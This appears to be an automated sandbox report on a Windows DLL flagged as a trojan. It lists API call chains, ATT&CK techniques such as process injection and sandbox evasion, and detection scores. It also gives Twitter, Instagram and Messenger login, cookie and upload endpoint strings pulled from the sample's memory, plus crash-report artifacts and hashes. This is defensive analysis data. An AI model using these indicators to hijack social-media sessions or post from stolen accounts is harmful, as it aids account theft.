Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_1003AFFE __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_1003AFFE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10023315 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_10023315
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10026CE8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_10026CE8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10028D22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_10028D22
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_101456A0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError,1_2_101456A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,1_2_1003585F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_10035CD8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_10035D3D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,1_2_10035D79
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_xtoa_s@20,1_2_1002B5DD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,1_2_10035F69
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10145D10 _malloc,_memset,GetSystemTime,SystemTimeToFileTime,SystemTimeToFileTime,__aulldiv,1_2_10145D10

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsNative API1Path InterceptionProcess Injection1Virtualization/Sandbox Evasion1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRundll321LSASS MemorySecurity Software Discovery3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsSystem Information Discovery12SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 346331 Sample: A8xYhQFvXo Startdate: 30/01/2021 Architecture: WINDOWS Score: 60 21 Malicious sample detected (through community Yara rule) 2->21 23 Multi AV Scanner detection for submitted file 2->23 25 Machine Learning detection for sample 2->25 7 loaddll32.exe 1 2->7         started        process3 process4 9 rundll32.exe 7->9         started        11 rundll32.exe 7->11         started        13 rundll32.exe 7->13         started        process5 15 WerFault.exe 23 9 9->15         started        17 WerFault.exe 9 11->17         started        19 WerFault.exe 2 9 13->19         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
A8xYhQFvXo.dll17%VirustotalBrowse
A8xYhQFvXo.dll19%MetadefenderBrowse
A8xYhQFvXo.dll44%ReversingLabsWin32.Trojan.Mingloa
A8xYhQFvXo.dll100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://01%s08%s15%s22%sWebGL%d%02d%s.club/http://01%s08%s15%s22%sFrankLin%d%02d%s.xyz/post_info.0%Avira URL Cloudsafe
https://twitter.comsec-fetch-dest:0%Avira URL Cloudsafe
https://www.instagram.comsec-fetch-mode:0%Avira URL Cloudsafe
https://twitter.comReferer:0%Avira URL Cloudsafe
http://www.interestvideo.com/video1.php0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://01%s08%s15%s22%sWebGL%d%02d%s.club/http://01%s08%s15%s22%sFrankLin%d%02d%s.xyz/post_info.rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllfalse
  • Avira URL Cloud: safe
low
https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllfalse
    		high
    https://twitter.com/compose/tweetsec-fetch-dest:rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllfalse
      		high
      https://www.instagram.com/A8xYhQFvXo.dllfalse
        		high
        https://www.messenger.com/rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllfalse
          		high
          https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&merundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllfalse
            		high
            https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllfalse
              		high
              https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blockingrundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllfalse
                		high
                https://www.messenger.com/origin:rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllfalse
                  		high
                  https://twitter.com/rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllfalse
                    		high
                    https://twitter.com/ookie:rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllfalse
                      		high
                      https://api.twitter.com/1.1/statuses/update.jsonrundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllfalse
                        		high
                        https://curl.haxx.se/docs/http-cookies.htmlrundll32.exe, 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235936438.0000000010171000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245392829.0000000010171000.00000002.00020000.sdmp, A8xYhQFvXo.dllfalse
                          		high
                          https://twitter.comsec-fetch-dest:A8xYhQFvXo.dllfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://upload.twitter.com/i/media/upload.jsonrundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllfalse
                            		high
                            https://twitter.com/compose/tweetsec-fetch-mode:A8xYhQFvXo.dllfalse
                              		high
                              https://www.instagram.comsec-fetch-mode:rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.instagram.com/accounts/login/ajax/facebook/A8xYhQFvXo.dllfalse
                                		high
                                https://www.instagram.com/sec-fetch-site:rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllfalse
                                  		high
                                  https://twitter.comReferer:A8xYhQFvXo.dllfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.messenger.com/accept:rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllfalse
                                    		high
                                    http://www.interestvideo.com/video1.phpA8xYhQFvXo.dllfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.messenger.comrundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllfalse
                                      		high
                                      https://www.instagram.com/accept:rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllfalse
                                        		high
                                        https://www.messenger.com/login/nonce/rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllfalse
                                          		high
                                          https://www.messenger.com/login/nonce/ookie:rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllfalse
                                            		high
                                            https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dllfalse
                                              		high
                                              https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2A8xYhQFvXo.dllfalse
                                                		high

                                                Contacted IPs

                                                No contacted IP infos

                                                General Information

                                                Joe Sandbox Version:31.0.0 Emerald
                                                Analysis ID:346331
                                                Start date:30.01.2021
                                                Start time:14:22:06
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 4m 38s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:A8xYhQFvXo (renamed file extension from none to dll)
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:10
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal60.winDLL@10/12@0/0
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 100% (good quality ratio 95.7%)
                                                • Quality average: 76.1%
                                                • Quality standard deviation: 26.4%
                                                HCA Information:Failed
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Stop behavior analysis, all processes terminated
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): WerFault.exe
                                                • Excluded IPs from analysis (whitelisted): 52.147.198.201, 13.88.21.125
                                                • Excluded domains from analysis (whitelisted): skypedataprdcoleus16.cloudapp.net, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com, skypedataprdcolwus15.cloudapp.net

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                14:23:06API Interceptor3x Sleep call for process: WerFault.exe modified
                                                14:23:11API Interceptor1x Sleep call for process: loaddll32.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASN

                                                No context

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_5a155b1e9b8901355626d9881b9ed599cf1223_82810a17_1b0352d0\Report.wer
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):12526
                                                Entropy (8bit):3.771298130946976
                                                Encrypted:false
                                                SSDEEP:192:Reiq0oXAdHBUZMX4jed+qM/u7sUS274ItWc7:Ei8XiBUZMX4jey/u7sUX4ItWc7
                                                MD5:DF86840392878D8F23C871F2E70B796C
                                                SHA1:C7C4E2ACF2DCC505C36F65B27AC6295237FE230D
                                                SHA-256:C4C8476A732491F39F347BB3CF53FB7859E52E335DEB280B0E3381832744431F
                                                SHA-512:A2015F5D4DF264A4C5BD994E7AA8B0E23632E410F07F7804EC05A5F57EC431926ED69B6E794E53F88C4BF9CBEC423A88AC1570700953B6E169E6ACAD42C10D4F
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.6.5.1.8.9.8.7.1.9.7.1.4.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.6.5.1.8.9.8.8.5.8.7.7.6.8.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.6.a.9.8.9.6.-.1.5.6.6.-.4.a.c.5.-.9.9.8.2.-.b.3.d.9.7.e.d.a.e.e.1.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.0.1.7.d.0.8.3.-.2.8.e.6.-.4.b.5.c.-.8.d.d.2.-.8.e.7.8.f.1.2.e.8.5.3.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.f.0.-.0.0.0.1.-.0.0.1.7.-.b.8.d.d.-.b.c.7.a.5.6.f.7.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.
                                                C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_9155b230567b23dc90309f27732428df1d2d4b15_82810a17_1a0b4812\Report.wer
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):12524
                                                Entropy (8bit):3.771244807080854
                                                Encrypted:false
                                                SSDEEP:192:s6i00oX0cHBUZMX4jed+qM/u7sUS274ItWcu:9iCXdBUZMX4jey/u7sUX4ItWcu
                                                MD5:A8BBCF85BFD93259DCA577CCBA62C6DF
                                                SHA1:130D348413E2ED000B1621AA9C2A3A0E80C8E559
                                                SHA-256:225C0218DF5763AD8275D5296449CCAB586476298EEA99B173609F90ADD1B05C
                                                SHA-512:937B31AFC1F835464D7A31251B051B77E493FF503C8D5A7819C30C4D95676E67C0DC04B76DB4E35534E3441F995A2D6317229CF075F40D28B71A76B0F13C3C70
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.6.5.1.8.9.8.4.2.9.0.8.9.9.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.6.5.1.8.9.8.5.3.3.7.7.7.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.4.9.0.0.c.7.7.-.9.b.3.2.-.4.f.c.d.-.a.2.a.3.-.d.0.6.7.4.3.b.a.2.e.3.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.2.e.f.6.a.8.4.-.c.d.4.d.-.4.9.d.f.-.b.8.b.5.-.3.a.d.e.4.b.f.d.8.7.1.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.f.c.-.0.0.0.1.-.0.0.1.7.-.d.a.5.9.-.c.5.7.8.5.6.f.7.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.
                                                C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_9155b230567b23dc90309f27732428df1d2d4b15_82810a17_1b8b63b8\Report.wer
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):12522
                                                Entropy (8bit):3.7708356318523943
                                                Encrypted:false
                                                SSDEEP:192:Geiy0oXMcHBUZMX4jed+qM/u7sUS274ItWcF:XiUXVBUZMX4jey/u7sUX4ItWcF
                                                MD5:192FD41F5E2D69E0D7466FA6DC55B573
                                                SHA1:6900AA02BA64E6BD4C83B288AFA06B8EB1B1F29A
                                                SHA-256:73475F8652413694AB066DD064A7CE658283399E8B15AB99DDE5EFDF1A4EA126
                                                SHA-512:9F399EB22247676DF72B14CED9E166DE4239BD197087FCE012CBE1357BE6F843BD9BBEBC3379B3BF30D48B5C58E02D2DFD2A4413344D247BB6C3FE13D96984B3
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.6.5.1.8.9.9.2.2.2.8.5.6.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.6.5.1.8.9.9.3.0.7.2.1.2.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.8.6.a.a.9.4.-.6.2.d.7.-.4.6.f.7.-.a.7.3.1.-.b.2.c.d.8.e.c.2.5.9.a.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.2.9.7.b.e.d.d.-.4.6.f.0.-.4.c.b.d.-.9.3.9.f.-.7.8.f.2.8.3.d.2.2.b.9.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.5.c.-.0.0.0.1.-.0.0.1.7.-.7.f.c.2.-.a.c.7.c.5.6.f.7.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DB2.tmp.dmp
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 30 22:23:04 2021, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):54380
                                                Entropy (8bit):2.0015561523103194
                                                Encrypted:false
                                                SSDEEP:192:nCduNZT6NASLzm9NbqLzdtQGd2K/WjZerJWGZKXZh4KzNxVw:CLzwbiCO27VeAGZOZhrRw
                                                MD5:9960CD95476181EF57DFC589CA17D6CE
                                                SHA1:13DB12E3C3A8645F2FD0D1EA6A45272C7FD689BC
                                                SHA-256:FBA058585194DA498260F97D7D25451379657E0BB3DDA7231050553EC44F8473
                                                SHA-512:2562F958B912B8B367417C90446C6B6F3F925710DC3B79D97CFFBDC44A1421612680CDF12E100DC787CE9420E24C6302C2796F88701F30A1C38A27B6149A0213
                                                Malicious:false
                                                Reputation:low
                                                Preview: MDMP....... .......H..`...................U...........B......D ......GenuineIntelW...........T...........E..`.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER4043.tmp.WERInternalMetadata.xml
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8266
                                                Entropy (8bit):3.6968442224830307
                                                Encrypted:false
                                                SSDEEP:192:Rrl7r3GLNiqT696YAT6Kh62mgmfTuSBCprRg89bNisfQvm:RrlsNie696Y06662mgmfTuSGdNhfl
                                                MD5:43BD54E768548B366930B31787D276A8
                                                SHA1:D5C19415165E51B494EAAD9DF4591D8EDB909D71
                                                SHA-256:335195883725319DA55D5CA8881958618530D96B6F0CE6CAAD6F82C44A658C95
                                                SHA-512:223D9237FC5DEC58112BFFCB7C646367A17B42E72708CFA0162F0137D61999929A30A3996950271577E0A1A5C800BFE4D0FF5055739455E8269B10A6A7B78A21
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.5.2.<./.P.i.d.>.......
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER413E.tmp.xml
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4629
                                                Entropy (8bit):4.472952170485334
                                                Encrypted:false
                                                SSDEEP:48:cvIwSD8zsxBJgtWI9G4WSC8BZ8fm8M4JCdsUFrX+q8/oJ34SrSCd:uITfVdxSNQJOX53DWCd
                                                MD5:779F5EA92B661C11A3A26AB103727370
                                                SHA1:366C7DDF4A32E5C0591C9E34849D9D6C4900BDC2
